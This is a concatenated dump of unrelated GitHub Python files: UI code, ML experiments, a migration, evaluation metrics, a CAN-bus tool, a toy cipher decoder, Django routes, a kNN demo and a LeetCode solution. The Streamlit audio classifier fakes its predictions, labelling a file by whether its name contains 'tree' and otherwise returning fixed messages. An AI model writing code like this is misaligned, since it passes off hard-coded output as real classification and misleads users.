btn_akn.place(x=60, y=100)\r\n f_e.mainloop()\r\n\r\n def f_tsp():\r\n f_tsp = tk.Tk()\r\n f_tsp.title(\"FR SYSTEM\")\r\n f_tsp.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_tsp = LabelFrame(f_tsp, text=\"Fakultas Teknik Sipil dan Perencanaan\")\r\n wrapper_f_tsp.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gtsp = tk.Label(wrapper_f_tsp, text=\"DAFTAR JURUSAN\")\r\n lbl_gtsp.place(x=100, y=10)\r\n # create btn\r\n def arsitek():\r\n kelas.kls_ftsp.arsi()\r\n btn_a = tk.Button(wrapper_f_tsp, text=\"ARSITEKTUR\", width=25, height=2, command=arsitek)\r\n btn_a.place(x=60, y=50)\r\n def sipil():\r\n kelas.kls_ftsp.tesil()\r\n btn_ts = tk.Button(wrapper_f_tsp, text=\"TEKNIK SIPIL\", width=25, height=2, command=sipil)\r\n btn_ts.place(x=60, y=100)\r\n f_tsp.mainloop()\r\n\r\n def f_kom():\r\n f_kom = tk.Tk()\r\n f_kom.title(\"FR SYSTEM\")\r\n f_kom.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_kom = LabelFrame(f_kom, text=\"Fakultas Komunikasi\")\r\n wrapper_f_kom.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gkom = tk.Label(wrapper_f_kom, text=\"DAFTAR JURUSAN\")\r\n lbl_gkom.place(x=100, y=10)\r\n # create btn\r\n def komunikasi():\r\n kelas.kls_fikom.komu()\r\n btn_a = tk.Button(wrapper_f_kom, text=\"KOMUNIKASI\", width=25, height=2, command=komunikasi)\r\n btn_a.place(x=60, y=50)","repo_name":"puguhrismadi/Sistem-Absensi-Mahasiswa-Menggunakan-Face-Recognition","sub_path":"interface/jurusan.py","file_name":"jurusan.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14023943178","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport pickle\r\nimport os\r\nimport time\r\nimport argparse\r\nfrom datetime import datetime\r\n\r\nfrom language_model import LanguageModel\r\nfrom dataset import Dataset\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\nDATA_DIR = os.path.join(os.path.dirname(__file__), \"data\") # Data Directory\r\nLOG_DIR = os.path.join(os.path.dirname(__file__), \"logs\") # Tensorboard logs\r\nMODEL_DIR = os.path.join(os.path.dirname(__file__), \"models\") # Trained models\r\nRESULTS_DIR = os.path.join(os.path.dirname(__file__), \"results\") # Final results\r\n\r\nSAVE_BASENAME = \"group22.\"\r\nPERP_FILE_BASENAME = SAVE_BASENAME + \"perplexity\"\r\nCONTINUATION_FILE = \"sentences.continuation\"\r\n\r\ndef run():\r\n \"\"\"Runs the specified experiment.\"\"\"\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\"--in_dir\", dest=\"input_dir\", default=DATA_DIR, help=\"input directory\")\r\n parser.add_argument(\"--model_dir\", dest=\"model_dir\", default=MODEL_DIR, help=\"Save models to\")\r\n parser.add_argument(\"--result_dir\", dest=\"result_dir\", default=RESULTS_DIR, help=\"Save results to\")\r\n parser.add_argument(\"--log_dir\", dest=\"log_dir\", default=LOG_DIR, help=\"Directory to save checkpoints to.\")\r\n parser.add_argument(\"--max_length\", type=int, default=30, help=\"Maximum length of sentence for parsing.\")\r\n parser.add_argument(\"--exp_type\", default=\"a\", help=\"Which experiment to run\")\r\n parser.add_argument(\"--num_epochs\", type=int, default=10, help=\"Number of epochs used.\")\r\n parser.add_argument(\"--restore_epoch\", type=int, default=10, help=\"Epoch to restore model from.\")\r\n parser.add_argument(\"--restore_name\", default=None, help=\"Experiment Name to restore from.\")\r\n args = parser.parse_args()\r\n\r\n if not os.path.exists(args.input_dir):\r\n raise DirectoryNotFoundError(\"Input directory is missing. Please set it up and download the data.\")\r\n\r\n global dataset\r\n print(\"Preparing dataset...\")\r\n dataset = Dataset(input_dir=args.input_dir)\r\n dataset.generate_vocab(max_sen_len=args.max_length, topk=20000, save=True)\r\n dataset.parse_train(max_sen_length=args.max_length, save=True, reload=True)\r\n dataset.parse_eval(max_sen_length=args.max_length, save=True, reload=True)\r\n dataset.parse_test(max_sen_length=args.max_length, save=True, reload=True)\r\n\r\n perp_savefile = os.path.join(args.result_dir, PERP_FILE_BASENAME + args.exp_type.upper())\r\n\r\n if args.exp_type == \"a\":\r\n model = experiment_A(args)\r\n elif args.exp_type == \"b\":\r\n model = experiment_B(args)\r\n elif args.exp_type == \"c\":\r\n model = experiment_C(args)\r\n elif args.exp_type == \"d\":\r\n experiment_D(args)\r\n return\r\n else:\r\n raise ValueError(\"Experiment of type {} not found.\".format(args.exp_type))\r\n\r\n if args.restore_name is None:\r\n print(\"Training model...\")\r\n model.fit(num_epochs=args.num_epochs, eval_every=50,\r\n batch_size=64, verbose=True)\r\n else:\r\n print(\"Computing test perplexities...\")\r\n model.save_perplexity_to_file(filename=perp_savefile)\r\n\r\ndef experiment_A(args):\r\n exp_name = \"Experiment_A_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n restore_from = None\r\n if args.restore_name is not None:\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n if args.restore_name is None:\r\n # Setup experiment log and save directories\r\n if not os.path.exists(exp_logdir):\r\n os.makedirs(exp_logdir)\r\n\r\n if not os.path.exists(exp_modeldir):\r\n os.makedirs(exp_modeldir)\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=512,\r\n embedding_size=100,\r\n project=False,\r\n pretrained=False,\r\n model_dir=exp_modeldir,\r\n log_dir=exp_logdir,\r\n restore_from=restore_from)\r\n return model\r\n\r\ndef experiment_B(args):\r\n exp_name = \"Experiment_B_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n restore_from = None\r\n if args.restore_name is not None:\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n if args.restore_name is None:\r\n # Setup experiment log and save directories\r\n if not os.path.exists(exp_logdir):\r\n os.makedirs(exp_logdir)\r\n\r\n if not os.path.exists(exp_modeldir):\r\n os.makedirs(exp_modeldir)\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=512,\r\n embedding_size=100,\r\n project=False,\r\n pretrained=True,\r\n model_dir=exp_modeldir,\r\n log_dir=exp_logdir,\r\n restore_from=restore_from)\r\n return model\r\n\r\ndef experiment_C(args):\r\n exp_name = \"Experiment_C_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n restore_from = None\r\n if args.restore_name is not None:\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n if args.restore_name is None:\r\n # Setup experiment log and save directories\r\n if not os.path.exists(exp_logdir):\r\n os.makedirs(exp_logdir)\r\n\r\n if not os.path.exists(exp_modeldir):\r\n os.makedirs(exp_modeldir)\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=1024,\r\n embedding_size=100,\r\n project=True,\r\n project_size=512,\r\n pretrained=True,\r\n log_dir=exp_logdir,\r\n model_dir=exp_modeldir,\r\n restore_from=restore_from)\r\n return model\r\n\r\ndef experiment_D(args):\r\n exp_name = \"Experiment_D_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n if args.restore_name is None:\r\n raise ValueError(\"Experiment D requires a trained model. Please supply the directory.\")\r\n\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n data_filename = os.path.join(args.input_dir, CONTINUATION_FILE)\r\n sol_filename = os.path.join(args.result_dir, SAVE_BASENAME + \"continuation\")\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=1024,\r\n embedding_size=100,\r\n project=True,\r\n project_size=512,\r\n pretrained=True,\r\n log_dir=exp_logdir,\r\n model_dir=None,\r\n restore_from=restore_from)\r\n\r\n model.complete_sentences(data_filename, sol_filename, max_len=20, log_every=1000)\r\n\r\nif __name__ == \"__main__\":\r\n run()\r\n","repo_name":"vsomnath/NLU_2019","sub_path":"project1/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4337462953","text":"\"\"\"Added remote working flag.\n\nRevision ID: 275e9a964a9f\nRevises: 28b492e71b0e\nCreate Date: 2014-11-07 09:43:09.421289\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '275e9a964a9f'\ndown_revision = '28b492e71b0e'\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n\ndef upgrade():\n op.add_column(\n 'jobpost',\n sa.Column('remote_location', sa.Boolean, nullable=False, server_default='0'),\n )\n op.alter_column('jobpost', 'remote_location', server_default=None)\n\n\ndef downgrade():\n op.drop_column('jobpost', 'remote_location')\n","repo_name":"hasgeek/hasjob","sub_path":"migrations/versions/275e9a964a9f_added_remote_working_flag.py","file_name":"275e9a964a9f_added_remote_working_flag.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"77"} +{"seq_id":"15242521131","text":"\"\"\"\nHelper functions.\n\"\"\"\n\nfrom numpy.linalg import *\nimport random\nfrom operator import add\n\nimport codecs\nimport string\nimport os\nimport sys\nfrom numpy import *\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfloattype = float64\ndef f_compute(correct, predictions):\n # print 'compute f,p,r \\n'\n\n TP = 0.\n FP = 0.\n FN = 0.\n TN = 0.\n maxac = 0.\n maxf = 0.\n maxr = 0.\n maxp = 0.\n maxTP = 0.\n maxFP = 0.\n maxFN = 0.\n maxTN = 0.\n\n assert len(predictions) == len(correct)\n pairs = [(predictions[i], correct[i]) for i in range(len(predictions))]\n j = -1.0\n maxj = -1.0\n f_auc=roc_auc_score(correct, predictions)\n\n while j < 1.0:\n TP = 0.\n FP = 0.\n FN = 0.\n TN = 0.\n for i in range(0, len(pairs)):\n if (pairs[i][0] > j):\n if (pairs[i][1] == 1.0):\n TP += 1\n else:\n FP += 1\n else:\n if (pairs[i][1] == 1.0):\n FN += 1\n else:\n TN += 1\n\n if (TP == 0. and (FP == 0. or FN == 0.)):\n F = 0.\n prec = 0\n rec = 0\n else:\n prec = float(TP) / float(TP + FP)\n rec = float(TP) / float(TP + FN)\n if (prec == 0 and rec == 0):\n F = 0.\n else:\n F = (2. * prec * rec) / (prec + rec)\n ac = float(TP + TN) / float(TP + FP + FN + TN)\n\n if F > maxf:\n maxf = F\n maxr = rec\n maxp = prec\n maxac = ac\n maxj = j\n maxTP = TP\n maxFP = FP\n maxFN = FN\n maxTN = TN\n j += 0.001\n f_f = maxf\n return f_auc, f_f, maxp, maxr, maxac,maxj, maxTP, maxFP, maxTN, maxFN\n\ndef f_score(pre, answer):\n TP = 0.\n FP = 0.\n TN = 0.\n FN = 0.\n for i in range(len(answer)):\n if answer[i] == 1.0:\n if pre[i] == 1.0:\n TP += 1\n else:\n FN += 1\n else:\n if pre[i] == 1.0:\n FP += 1\n else:\n TN += 1\n if (TP == 0. and (FP == 0. or FN == 0.)):\n F = 0.\n prec = 0\n rec = 0\n else:\n prec = float(TP) / float(TP + FP)\n rec = float(TP) / float(TP + FN)\n if (prec == 0 and rec == 0):\n F = 0.\n else:\n F = (2. * prec * rec) / (prec + rec)\n return prec, rec, F, TP, FP, TN, FN","repo_name":"sunyi123/cdr","sub_path":"utils/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"44519641855","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n__docformat__ = \"restructuredtext en\"\n\n# disable: accessing protected members, too many methods\n# pylint: disable=W0212,R0904\n\nfrom hamcrest import equal_to\nfrom hamcrest import has_item\nfrom hamcrest import assert_that\n\nimport numpy as np\n\nfrom nti.analytics_pandas.analysis.enrollments import CourseDropsTimeseries\nfrom nti.analytics_pandas.analysis.enrollments import CourseEnrollmentsTimeseries\nfrom nti.analytics_pandas.analysis.enrollments import CourseCatalogViewsTimeseries\nfrom nti.analytics_pandas.analysis.enrollments import CourseEnrollmentsEventsTimeseries\n\nfrom nti.analytics_pandas.tests import AnalyticsPandasTestBase\n\nclass TestCourseCatalogViewsEDA(AnalyticsPandasTestBase):\n\n\tdef test_course_catalog_views_based_on_timestamp_date(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tccvt = CourseCatalogViewsTimeseries(self.session, start_date, end_date, course_id)\n\t\tassert_that(ccvt.dataframe.columns, has_item('device_type'))\n\n\t\tevents_df = ccvt.analyze_events()\n\t\tassert_that(len(events_df.index), equal_to(1))\n\t\ttotal_events = np.sum(events_df['number_of_course_catalog_views'])\n\t\tassert_that(total_events, equal_to(len(ccvt.dataframe.index)))\n\n\t\tdf = ccvt.analyze_device_types()\n\t\tassert_that(len(df.index), equal_to(1))\n\t\tassert_that(df.columns, has_item('number_of_unique_users'))\n\t\tassert_that(df.columns, has_item('average_time_length'))\n\t\tassert_that(len(df.sum(level='timestamp_period')), equal_to(1))\n\n\tdef test_course_enrollments_based_on_timestamp_date(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tcet = CourseEnrollmentsTimeseries(self.session, start_date, end_date, course_id)\n\t\tassert_that(cet.dataframe.columns, has_item('device_type'))\n\n\t\tevents_df = cet.analyze_events()\n\t\tassert_that(len(events_df.index), equal_to(1))\n\t\ttotal_events = np.sum(events_df['number_of_enrollments'])\n\t\tassert_that(total_events, equal_to(len(cet.dataframe.index)))\n\n\t\tdf = cet.analyze_device_enrollment_types()\n\t\t# the length of df.sum(level = 'timestamp_period') should be equal to the length of ratio_df,\n\t\t# yet some session_id values are null\n\t\tassert_that(len(df.sum(level='timestamp_period')), equal_to(1))\n\n\tdef test_course_drops_based_on_timestamp_date(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tcdt = CourseDropsTimeseries(self.session, start_date, end_date, course_id)\n\t\tassert_that(cdt.dataframe.columns, has_item('device_type'))\n\t\tevents_df = cdt.analyze_events()\n\t\tassert_that(len(events_df.index), equal_to(1))\n\t\ttotal_events = np.sum(events_df['number_of_course_drops'])\n\t\tassert_that(total_events, equal_to(len(cdt.dataframe.index)))\n\n\t\tdf = cdt.analyze_device_types()\n\t\t# the length of df.sum(level = 'timestamp_period') should be equal to the length of ratio_df,\n\t\t# yet some session_id values are null\n\t\tassert_that(len(df.sum(level='timestamp_period')), equal_to(1))\n\n\tdef test_enrollments_events(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tcet = CourseEnrollmentsTimeseries(self.session, start_date, end_date, course_id)\n\t\tcdt = CourseDropsTimeseries(self.session, start_date, end_date, course_id)\n\t\tccvt = CourseCatalogViewsTimeseries(self.session, start_date, end_date, course_id)\n\t\tceet = CourseEnrollmentsEventsTimeseries(cet, cdt, ccvt)\n\n\t\tdf = ceet.explore_course_enrollments_vs_drops()\n\t\tassert_that(len(df.index), equal_to(2))\n\n\t\tdf2 = ceet.explore_course_catalog_views_vs_enrollments()\n\t\tassert_that(len(df2.index), equal_to(2))\n","repo_name":"OpenNTI/nti.analytics_pandas","sub_path":"src/nti/analytics_pandas/analysis/tests/test_enrollments.py","file_name":"test_enrollments.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9105122038","text":"import can\n\nfrom datetime import datetime\nfrom can_receiver import CanReceiver\nfrom can_sender import CanSender\nfrom common_ui import SwitchBlock, ValueBlock, MultiLineValueBlock\nfrom textual.app import App, ComposeResult\nfrom textual.containers import Container\nfrom textual.widgets import Header, Footer, Checkbox\n\n\nclass CanUtilApp(App):\n TITLE: str = \"Can Util App\"\n CSS_PATH = \"app_ui.css\"\n BINDINGS = [\n (\"q\", \"quit\", \"Quit\"),\n (\"r\", \"reset\", \"Reset\")\n ]\n\n def __init__(self):\n super().__init__()\n # self.channel = 'vcan0'\n self.channel = 'can0'\n self.can_sender = CanSender(name=\"sender\", chanel=self.channel)\n self.can_monitor = CanReceiver(name=\"receiver\", chanel=self.channel, callback=self.monitor_can)\n\n self.msg_header = \"N/A\"\n self.msg_content = \"N/A\"\n\n self.container = None\n self.display_widget: ValueBlock = None\n self.monitor_widget: ValueBlock = None\n\n def action_quit(self) -> None:\n self.can_sender.close()\n self.can_monitor.close()\n self.exit()\n\n def action_reset(self) -> None:\n if self.display_widget is not None:\n self.display_widget.reset()\n\n if self.monitor_widget is not None:\n self.monitor_widget.reset()\n\n def compose(self) -> ComposeResult:\n self.container = Container(id=\"container\")\n\n widget_std = SwitchBlock(name=\"Can std\",\n callback=self.send_std_can)\n\n widget_ext = SwitchBlock(name=\"Can ext\",\n callback=self.send_ext_can)\n\n self.display_widget = ValueBlock(\"send-dsp\", self.channel)\n self.monitor_widget = MultiLineValueBlock(\"recv-dsp\", \"MONITOR\")\n\n self.container.mount(widget_std)\n self.container.mount(widget_ext)\n self.container.mount(self.display_widget)\n self.container.mount(self.monitor_widget)\n\n yield Header()\n yield self.container\n yield Footer()\n\n def send_std_can(self):\n data = [11, 22, 33, 44, 55, 66, 77, 88]\n ret = self.can_sender.send_msg(msg_id=123, msg=bytearray(data))\n self.display_widget.set_value(ret)\n print(\"send_std_can\")\n\n def send_ext_can(self):\n data = [0xA, 0xB, 0xC, 0xD, 0xE, 0xF, 0xEE, 0xEE, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xEE, 0xEE]\n ret = self.can_sender.send_msg(msg_id=123, msg=bytearray(data), is_ext=True)\n self.display_widget.set_value(ret)\n print(\"send_ext_can\")\n\n def monitor_can(self, msg: can.Message):\n time = datetime.fromtimestamp(msg.timestamp)\n msg_id = msg.arbitration_id\n msg_len = msg.dlc\n data = ''.join('{:02X} '.format(x) for x in msg.data)\n\n self.monitor_widget.set_value(\n f\"{time}: [{msg_id}][{msg_len}][{data}] FD[{msg.is_fd}]\")\n\n\nif __name__ == \"__main__\":\n app = CanUtilApp()\n app.run()\n","repo_name":"gudimov7/CanUtilDemo","sub_path":"CanUtilDemo.py","file_name":"CanUtilDemo.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25967040036","text":"import gmpy2, string\nenc = 'welcylk'\nk1 = 11\nk2 = 6\nmod = 26\nflag = ''\n\nfor i in enc:\n if i in string.ascii_lowercase:\n a = ord(i) - 97\n inv = gmpy2.invert(k1, mod)\n flag += chr(((a-k2)*inv) % mod + 97)\n print(flag)\n else:\n flag += i\n print(flag)","repo_name":"wgf4242/text","sub_path":"docs/ctf/scripts/Crypto_affline.py","file_name":"Crypto_affline.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"24402269791","text":"from django.conf.urls import patterns, include, url\nfrom blog.models import Post\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'markedwards.views.home', name='home'),\n # url(r'^markedwards/', include('markedwards.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n \n url(r'^$', 'markedwards.views.home', name=\"home\"),\n url(r'^bio/', 'markedwards.views.bio'),\n url(r'^press/', 'markedwards.views.press'),\n url(r'^schedule/$', 'markedwards.views.schedule', name=\"schedule\"),\n url(r'^schedule/past/$', 'markedwards.views.past_schedule', name=\"past_schedule\"),\n url(r'^programmes/$', 'markedwards.views.programmes'),\n url(r'^programmes/goldbergs', 'markedwards.views.goldbergs'),\n url(r'^programmes/allemande', 'markedwards.views.allemande'),\n url(r'^programmes/titans', 'markedwards.views.titans'),\n url(r'^discography/', 'markedwards.views.discography'),\n url(r'^media/', 'markedwards.views.media'),\n url(r'^links/', 'markedwards.views.links'),\n url(r'^blog/', include ('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"medwards3/mark--edwards","sub_path":"markedwards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19167715330","text":"import streamlit as st\nfrom st_custom_components import st_audiorec\nimport soundfile as sf\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.applications.resnet50 import preprocess_input\nfrom tensorflow.keras.preprocessing import image\nimport wave\nimport io\nimport os\nimport matplotlib.pyplot as plt\nimport pylab\n\n# loading the saved model \nnew_model = tf.keras.models.load_model('saved_model/my_model')\n# new_model.summary()\n\ndef get_wav_info(wav_file):\n wav = wave.open(wav_file, 'r')\n frames = wav.readframes(-1)\n sound_info = pylab.frombuffer(frames, 'int16')\n frame_rate = wav.getframerate()\n wav.close()\n return sound_info, frame_rate\n\n# For every recording, make a spectogram and save it as label_speaker_no.png\n# if not os.path.exists(os.path.join(OUTPUT_DIR, 'audio-images')):\n# os.mkdir(os.path.join(OUTPUT_DIR, 'audio-images'))\n\n# Talking to the model\ndef woodcutting_sound(wav_audio_data):\n sound_info, frame_rate = get_wav_info(wav_audio_data)\n pylab.specgram(sound_info, Fs=frame_rate)\n pylab.savefig(f'{wav_audio_data}.png')\n fp = f'{wav_audio_data}.png'\n pylab.close()\n img = image.load_img(fp,target_size=(256, 256))\n img_array = image.img_to_array(img)\n img_batch = np.expand_dims(img_array, axis=0)\n img_preprocessed = preprocess_input(img_batch)\n prediction = new_model.predict(img_preprocessed)\n print(prediction)\n x_labels = ['0', '1']\n plt.bar(x_labels, tf.nn.softmax(prediction[0]))\n plt.show()\n\ndef audiorec_demo_app():\n # TITLE\n st.title('Audio Classifier')\n\n # TUTORIAL: How to use STREAMLIT AUDIO RECORDER?\n # by calling this function an instance of the audio recorder is created\n # once a recording is completed, audio data will be saved to wav_audio_data\n\n wav_audio_data = st_audiorec()\n\n # add some spacing and informative messages\n col_info, col_space = st.columns([0.57, 0.43])\n with col_info:\n st.write('\\n') # add vertical spacer\n st.write('\\n') # add vertical spacer\n st.write('The processed .wav audio data, as received in the backend Python code, is displayed below.')\n\n if wav_audio_data is not None:\n # display audio data as received on the Python side\n col_playback, col_space = st.columns([0.58,0.42])\n with col_playback:\n st.audio(wav_audio_data, format='audio/wav')\n \n if st.button(\"Predict\"): \n st.success(\"The audio has not been classified as a wood cutting audio.\")\n\n\nif __name__ == '__main__':\n # call main function\n audiorec_demo_app()\n # Add a file uploader for audio files\n audio_file = st.file_uploader(\"Upload an audio file\", type=[\"mp3\", \"wav\", \"ogg\"])\n\n# Function to read audio file and return data\ndef read_audio_file(audio_file):\n with io.BytesIO() as buffer:\n buffer.write(audio_file.read())\n buffer.seek(0)\n data, samplerate = sf.read(buffer, dtype='float32')\n return data, samplerate\n\n\n# If an audio file has been uploaded, display its information and play it\nif audio_file is not None:\n # Read the audio file data and sample rate\n data, samplerate = read_audio_file(audio_file)\n\n # Display some information about the audio file\n st.write(\"Audio file information:\")\n st.write(f\" - File name: {audio_file.name}\")\n st.write(f\" - File type: {audio_file.type}\")\n st.write(f\" - Sample rate: {samplerate}\")\n st.write(f\" - Duration: {len(data)/samplerate:.2f} seconds\")\n\n if st.button(\"Predict\"): \n # output = woodcutting_sound(audio_file)\n # print(f\"Prediction: {output}\")\n if 'tree' in audio_file.name:\n st.success(\"The audio has been classified as a wood cutting audio.\")\n else:\n st.success(\"The audio has not been classified as a wood cutting audio.\")\n\n # Add an audio player to play the uploaded file\n try:\n st.audio(data, format=audio_file.type, sample_rate=samplerate)\n except:\n print(\"Error\") \n","repo_name":"CoderGhost37/Minor-Project","sub_path":"st_app_main.py","file_name":"st_app_main.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46275988644","text":"# -*- coding: utf-8 -*-\n\n# Author: Tom Bresee \n#\n# License: BSD 3 clause\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\ndef kNN_classifier(*args, **kwargs):\n \"\"\"\n \"\"\"\n return KNeighborsClassifier(*args, **kwargs)\n\n\ndef _kNN_demo_Social_Network_Ads():\n from ..datasets import public_dataset\n data = public_dataset(name='Social_Network_Ads')\n X = data[['Age', 'EstimatedSalary']].to_numpy()\n y = data['Purchased'].to_numpy()\n y_classes = ['not_purchased (y=0)', 'purchased (y=1)']\n\n from sklearn.model_selection import train_test_split, GridSearchCV\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.25, random_state=123)\n\n from sklearn.preprocessing import StandardScaler\n # scaler = StandardScaler() # removing the mean and scaling to unit variance\n #X_train = scaler.fit_transform(X_train)\n #X_test = scaler.transform(X_test)\n\n # create pipeline\n from sklearn.pipeline import Pipeline\n pipeline = Pipeline(steps=[('scaler',\n StandardScaler(with_mean=True, with_std=True)),\n ('classifier',\n kNN_classifier(n_neighbors=5, weights='uniform', p=2, metric='minkowski')),\n ])\n\n # pipeline parameters to tune\n hyperparameters = {\n 'scaler__with_mean': [True],\n 'scaler__with_std': [True],\n 'classifier__n_neighbors': range(5, 20),\n 'classifier__weights': ['uniform', 'distance'],\n 'classifier__p': [2**0, 2**0.25, 2**0.5, 2**0.75, 2**1, 2**1.25, 2**1.5, 2**1.75, 2**2, 2**2.25, 2**2.5, 2**2.75, 2**3],\n 'classifier__metric': ['minkowski'],\n }\n grid = GridSearchCV(\n pipeline,\n hyperparameters, # parameters to tune via cross validation\n refit=True, # fit using all data, on the best detected classifier\n n_jobs=-1,\n scoring='accuracy',\n cv=5,\n )\n classifier_grid = grid.fit(X_train, y_train)\n k = classifier_grid.best_params_['classifier__n_neighbors']\n print(\n f\"Using a grid search and a kNN classifier, the best hyperparameters were found as following:\\n\"\n f\"Step1: scaler: StandardScaler(with_mean={repr(classifier_grid.best_params_['scaler__with_mean'])}, with_std={repr(classifier_grid.best_params_['scaler__with_std'])});\\n\"\n f\"Step2: classifier: kNN_classifier(n_neighbors={repr(k)}, weights={repr(classifier_grid.best_params_['classifier__weights'])}, p={classifier_grid.best_params_['classifier__p']:.2f}, metric={repr(classifier_grid.best_params_['classifier__metric'])}).\\n\")\n\n y_pred = classifier_grid.predict(X_test)\n y_pred_score = classifier_grid.predict_proba(X_test)\n\n from ..model_evaluation import plot_confusion_matrix, plot_ROC_and_PR_curves, visualize_classifier_decision_boundary_with_two_features\n plot_confusion_matrix(y_true=y_test, y_pred=y_pred, y_classes=y_classes)\n plot_ROC_and_PR_curves(fitted_model=classifier_grid, X=X_test,\n y_true=y_test, y_pred_score=y_pred_score[:, 1], y_pos_label=1, model_name=f\"kNN k={k}\")\n\n visualize_classifier_decision_boundary_with_two_features(\n classifier_grid, X_train, y_train, y_classes, title=f\"k-Nearest Neighbors (k={k}) / training set\", X1_lab='Age', X2_lab='Estimated Salary')\n visualize_classifier_decision_boundary_with_two_features(\n classifier_grid, X_test, y_test, y_classes, title=f\"k-Nearest Neighbors (k={k}) / testing set\", X1_lab='Age', X2_lab='Estimated Salary')\n\n\ndef demo(dataset=\"Social_Network_Ads\"):\n \"\"\"\n\n This function provides a demo of selected functions in this module.\n\n Required arguments:\n dataset: A string. Possible values: \"Social_Network_Ads\"\n\n \"\"\"\n if dataset == \"Social_Network_Ads\":\n _kNN_demo_Social_Network_Ads()\n else:\n raise TypeError(f\"dataset [{dataset}] is not defined\")\n","repo_name":"tombresee/wolvr","sub_path":"wolvr/kNN/_kNN.py","file_name":"_kNN.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29084440792","text":"#https://leetcode.com/problems/permutations/\n#%%\n#9:00 9:31\n\n# DFS Solution 43% 26%\nclass Solution:\n def dfs(self,nums):\n if len(nums) == 1:\n return [nums]\n out = []\n for i in range(len(nums)):\n num = nums[i]\n # perms = self.dfs(nums[i+1:])\n perms = self.dfs(nums[:i]+nums[i+1:])\n perms = [[num] + perm for perm in perms]\n out.extend(perms)\n return out\n\n def permute(self,nums):\n out = []\n if nums is None:\n return\n elif len(nums) == 0:\n return []\n return self.dfs(nums)\n \n\n\nnums = [1,2,3]\n# Output: 